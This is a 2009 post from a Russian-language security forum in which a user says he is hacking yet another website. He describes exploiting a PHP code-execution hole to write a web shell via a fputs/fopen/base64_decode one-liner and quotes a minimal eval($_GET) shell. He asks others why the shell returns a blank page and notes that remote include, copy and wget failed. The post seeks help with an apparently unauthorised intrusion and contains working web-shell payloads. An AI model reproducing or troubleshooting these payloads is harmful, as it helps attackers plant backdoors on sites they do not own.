Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

13.09.2009, 22:17

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

Провел на форуме:
5749763

Репутация: 1680

Отправить сообщение для Nightmarе с помощью ICQ

Итак господа, при взломе очередного сайта я наткнулся на очередной ребус, который разгадать не могу.
Значит дырка выполнение php кода, пытаюсь залить шелл через такую конструкцию:
fputs(fopen('/www/shell.php',a),base64_decode('B64CODE'));
Шелл заливается нормально, но при попытке зайти на него, белая страница. Дело явно не в .htaccess и не в правах файла.
Если таким образом залить простой сценарий:

Код:

<?php
echo 'LOL';
?>

То он успешно выполняется, но если залить такой:

Код:

<?php
eval($_GET['lol']);
?>

То белая страница. Вот и всё...

Удалённого инклуда нету, через copy тоже самое, wget не работает вообще... Какие мысли на этот счёт у кого?
Лично я с таким сталкиваюсь впервые.